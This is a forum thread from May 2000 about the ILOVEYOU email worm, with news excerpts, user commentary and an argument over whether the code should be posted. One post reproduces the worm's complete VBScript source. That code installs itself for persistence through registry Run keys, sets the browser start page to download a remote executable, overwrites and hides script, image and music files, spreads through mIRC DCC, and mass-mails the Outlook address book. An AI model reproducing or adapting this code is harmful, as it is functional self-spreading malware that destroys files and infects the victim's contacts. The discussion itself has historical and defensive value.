LOVE-LETTER-FOR-YOU.txt.vbs

Draco · 04-05-2000 12:48pm #1

Very nasty.

I like the mirc.ini bit..."Please dont edit this script... mIRC will corrupt, if mIRC will corrupt... WINDOWS will affect and will not run correctly. thanks"
Pity the spelling is sh!te.

Draco

Trojan · 04-05-2000 12:48pm

RTE News:

http://www.rte.ie/news/2000/0504/iloveyou.html

A computer virus, known as the 'love letter bug', is attacking computers across the world. The virus is transmitted in an email with the subject heading 'I Love You'. It comes with an attachment 'Love-Letter-For-You.Txt.Vbs'. Many computers do not to show the extension .vbs, so users see a .txt or text file and assume it is a normal message. The virus is understood to forward itself to every address in the user's address book, as the Melissa virus did last year. The virus also overwrites scripting files with itself and changes the home page on Internet Explorer to go to a website and download another file. The properties of this file are unknown at present. The virus also attacks the graphics format .jpg and audio files mp3 and mp2.

Trojan · 04-05-2000 1:09pm

I agree Draco.

It amazes me how people can come up with complex code for these viruses, joke emails exe's etc and not manage to spell correctly.

An official looking message box with a typo is just a dead giveaway really, e.g. "Human Ressources" in that too much personal mail one...

Al.

Hobbes · 04-05-2000 3:49pm

As nasty as it seems, any chance of removing the code? Last thing I want to see is some Rollarblading muppet modifying it.

Only effects IE, Outlook and MIRC afaik

bubbles · 04-05-2000 4:35pm

Your worse than an old man Hobbes !!

Hobbes · 04-05-2000 5:01pm

Well it's not something I would post. You know kids these days, they are forever exploring.

I would at least break the URL links and some of the code so it wouldn't actually run.

I mean it was only put up for academic reasons right?

Guessing from the amount of damaged caused so far I would guess the author at this time is already firebombing his/her house and changing names.

Trojan · 04-05-2000 11:50pm

rem barok -loveletter(vbe) <i hate go to school>
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
else
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _
"<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-? @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _
"<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is good...@-@>"&vbcrlf& _
"<?-?HEAD><BODY ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ "&vbcrlf& _
"ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _
"<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this HTML file<BR>- Please press #-#YES#-# button to Enable ActiveX<?-?p>"&vbcrlf& _
"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@yellow@-@>

z

<?-?MARQUEE> "&vbcrlf& _
"<?-?BODY><?-?HTML>"&vbcrlf& _
"<SCRIPT language=@-@JScript@-@>"&vbcrlf& _
""&vbcrlf& _
"<?-?SCRIPT>"&vbcrlf& _
"<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _
""&vbcrlf& _
"<?-?SCRIPT>"
dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
set fso=CreateObject("Scripting.FileSystemObject")
set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)
for n=0 to ubound(lines)
lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37))
if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
end if
next
set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")
b.close
set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub

Pretence · 05-05-2000 10:30am

It effects Lotus notes aswell!!

MiCr0 · 05-05-2000 10:38am

what does it actually do?

Hobbes · 05-05-2000 10:38am

FFS, if there's an admin reading this at least scramble the code above. If someone had posted links to a virus creator center it would be nuked in a heartbeat.

I've already gotten 3 new variants of Virus.

Btw it doesn't effect Lotus Notes.

Yes - You can recieve the email via Lotus notes.

Yes - If you run the attachment it's going to trash your machine and notes.

No - It doesn't autosend to everyone in your Notes address book (I know this for a fact).

The only way I can think of doing it is if your using Outlook as your default mailer for Domino instead of notes.

Lastly if your Notes Admin has a braincell or two they can rig the Domino server to strip the vbs file before even the user gets it.

Pretence · 05-05-2000 10:43am

Tell that to Seagate, they use Lotus Notes, I dunno t'was my sister who told me she works there. I'm only passing on the info............

Asuka · 05-05-2000 12:13pm

Originally posted by Hobbes:
As nasty as it seems, any chance of removing the code? Last thing I want to see is some Rollarblading muppet modifying it.

That was my first reaction as well actually i.e wondering how people were so naive to start posting nasty virus code and hope that no one uses it to build up their l33+ h4><0ring skillz :P

You must be really bored to write all that code for no better reason than anarchy anyway. Its not like he gets payed...

amp · 05-05-2000 6:50pm

It's kind of interesting as the MIRC section seems to try and DCC the virus to a random nick.

It doesn't matter if it's posted here, there's plenty of places to get the above from. Know thine enemy or something.

Besides, just because it's an evil, damaging and costly prank doesn't mean the technology behind isn't interesting

And from a moral standpoint, it screws up your illegal mp3's and your donkey pr0n!!

Lunacy Abounds! Play GLminesweeper!

[This message has been edited by amp (edited 05-05-2000).]

Hobbes · 05-05-2000 11:00pm

I work in Lotus.

For the record, the only way you can get infected is if you run the VBS file. If you mean they got the payload, yes it's possible but it can't spread through Notes if your using normal settings.

Pretence · 05-05-2000 11:21pm

Aye I suppose I can take your work for it so......

Hobbes · 05-05-2000 11:50pm

Originally posted by MiCr0:
what does it actually do?

Off the top of my head.

- Changes your IE so it autodownloads some EXE when you launch IE.

- Erases the following files and puts this code into it. So opening up any of the files below starts the whole mess again.
*.vbs
*.vbe
*.js
*.jse
*.css
*.wsh
*.sct
*.hta
*.jpg
*.jpeg
- Renames the files above to *.*.vbs?

- if mp3 or mp2, hides the file and creates a *.vbs file with the first part of mp3 filename. So you think you have deleted them as well.

- If you have MIRC it infects your script.ini to spread itself to other people by DCC when you join a channel.

- Looks for MS Outlook and spreads itself using the address book list.

- Updates your registry. Seems to have some messy bit of code which is defunt. Looks like they were trying to hide what they were doing? It's possible they key they were trying to change is an autocheck by virus checkers which is why it's all messed up.

- Seems to launch a webpage then telling you to active ActiveX button.

Dunno, only briefly looking over the code I might be wrong in bits.

Take it · 06-05-2000 11:34pm

Srews up your Donkey Pr0n NNNNNOOOOOOOOOOOO What about Pokemon Pr0n?

Trojan · 08-05-2000 2:59pm

Originally posted by Hobbes:
FFS, if there's an admin reading this at least scramble the code above. If someone had posted links to a virus creator center it would be nuked in a heartbeat.

I think that it was already pretty highly available considering every email included the source...

That said, point taken. Apologies.

There are now about 12 variants documented.

Someone told me that the .vbs extension did not show up on some machines - anyone see this? Is it when you've that option in explorer to view suffixes? Hmm....

MS are keeping their mouths shut, the fools. What stupidity to have activex scripting enabled by default.

Al.

PS of course it was put up for academic purposes. it was highly available anyway.

[This message has been edited by Trojan (edited 08-05-2000).]

LoLth · 08-05-2000 3:15pm

our email server in work was set to screen out any *.vbs files as a safety measure (as well as updating sophos). Yet still some are being delivered. They don't have the .vbs extension, just .txt and I saw an .exe one as well.

My brother got one renamed to .pdf

Some little git out there must be collecting them and sending them on under different names.

Coyote · 08-05-2000 3:46pm

it's a old trick that you can give a file name with 256 letters, you name some think
"Iloveyou.txt .vbs"
with all the spaces some programs will not show the full name and all you will see is the "Iloveyou.txt" so people think it's just a txt file and not a .vbs
Coyote

spod · 08-05-2000 4:37pm

I don't see the point in removing the code. Anyone who recieved the virus has the code. If you didn't get it in your mailbox it's not much hassle to head to http://packetstorm.securify.com/ or some other similar site and snarf the code. The code is very much public domain, several million copies floating around. One more copy on a bbs for quakers isn't gonna make a huge difference imho.

LOVE-LETTER-FOR-YOU.txt.vbs

Comments